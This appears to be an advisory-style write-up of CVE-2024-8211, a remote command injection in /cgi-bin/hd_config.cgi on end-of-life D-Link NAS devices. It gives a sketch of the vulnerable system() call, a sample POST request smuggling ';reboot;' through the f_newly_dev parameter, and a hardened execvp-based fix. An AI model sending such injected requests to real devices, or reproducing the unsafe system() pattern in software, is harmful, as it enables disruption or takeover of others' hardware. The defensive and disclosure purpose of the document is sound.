A critical vulnerability, CVE-2024-8211, has been found in numerous unsupported D-Link devices, including the DNS-120, DNR-202L, DNS-315L, DNS-320, DNS-320L, DNS-320LW, DNS-321, DNR-322L, DNS-323, DNS-325, DNS-326, DNS-327L, DNR-326, DNS-340L, DNS-343, DNS-345, DNS-726-4, DNS-110-4, DNS-120-05, and DNS-155-04, in firmware versions up to 20240814. The vulnerability lies in the function cgi_FMT_Std2R1_DiskMGR of the file /cgi-bin/hd_config.cgi. Manipulating the argument f_newly_dev results in command injection, and the attack can be launched remotely. Although the exploit has been publicly disclosed, it only affects products that are no longer supported by the maintainer. The vendor, who was contacted in advance, confirms that the products are at their end-of-life and should be retired and replaced.

Code Snippet

#include <stdio.h>
#include <stdlib.h>

void cgi_FMT_Std2R1_DiskMGR(char * f_fpart_dev, char * f_newly_dev) {
  char command[512];
  ...
  /* both CGI parameters are pasted into a single shell command line */
  snprintf(command, sizeof(command), "mke2fs -j -L %s %s",
           sanitizeString(f_newly_dev), sanitizeString(f_fpart_dev));
  printf("<!-- cgi_FMT_Std2R1_DiskMGR: command=[%s] -->\n", command);
  system(command);   /* the assembled string is handed to /bin/sh -c */
  ...
}

Detailed Exploit Description

The vulnerable function cgi_FMT_Std2R1_DiskMGR is called from /cgi-bin/hd_config.cgi with two arguments: f_fpart_dev and f_newly_dev. The function builds a command-line string from these argument values and passes it to system(), which hands the string to a shell. Because the f_newly_dev argument is not properly sanitized, shell metacharacters in it are interpreted by that shell, allowing an attacker to inject additional commands.

As an example, an attacker can use crafted HTTP requests like the following to exploit this vulnerability:

POST /cgi-bin/hd_config.cgi?action=FormatPart2_L_R1 HTTP/1.1
Host: <target-device>
Content-Type: application/x-www-form-urlencoded
Content-Length: <length>

f_fpart_dev=/dev/sdb1&f_newly_dev=;reboot;label
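The following is an added example, not D-Link's code, showing how the snprintf()+system() pattern above would be hardened: each CGI parameter is checked against a strict allowlist, and mke2fs is started with execvp() and a separate argv so no shell ever parses user-supplied text. The function names (is_safe_arg, is_safe_dev, format_ext3) and the length limits are assumptions.

```c
/* Added example, not vendor code: hardened replacement for the
 * "mke2fs -j -L %s %s" + system() pattern. Function names are hypothetical. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Accept only characters that legitimately occur in a device path or
 * filesystem label; ';', '|', '&', '`', '$', quotes and whitespace are rejected. */
int is_safe_arg(const char *s, size_t max_len) {
    size_t n;
    if (s == NULL || *s == '\0') return 0;
    for (n = 0; s[n] != '\0'; n++) {
        unsigned char c = (unsigned char)s[n];
        if (n >= max_len) return 0;
        if (!(isalnum(c) || c == '/' || c == '_' || c == '-' || c == '.'))
            return 0;
    }
    return 1;
}

/* A device argument must additionally live under /dev/ and contain no "..". */
int is_safe_dev(const char *dev) {
    return is_safe_arg(dev, 64) && strncmp(dev, "/dev/", 5) == 0 &&
           strstr(dev, "..") == NULL;
}

/* Format `dev` as ext3 with label `label` (assumed 16-byte ext label limit).
 * Returns the mke2fs exit status, or -1 if validation fails; in that case
 * nothing is executed. */
int format_ext3(const char *label, const char *dev) {
    if (!is_safe_arg(label, 16) || !is_safe_dev(dev)) return -1;
    char *const argv[] = {"mke2fs", "-j", "-L", (char *)label, (char *)dev, NULL};
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execvp(argv[0], argv);  /* argv reaches mke2fs directly; no shell involved */
        _exit(127);
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

With this version the request body shown above, f_newly_dev=;reboot;label, is rejected by is_safe_arg() before any process is spawned.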

Original References

The original disclosure of this vulnerability can be found here.

NOTE: This vulnerability only affects products that are no longer supported by the maintainer. As the vendor was contacted early and confirmed that the products in question are at their end-of-life, it is recommended to retire and replace these devices with newer, supported alternatives to mitigate this security risk.

Timeline

Published on: 08/27/2024 19:15:18 UTC
Last modified on: 08/29/2024 15:54:56 UTC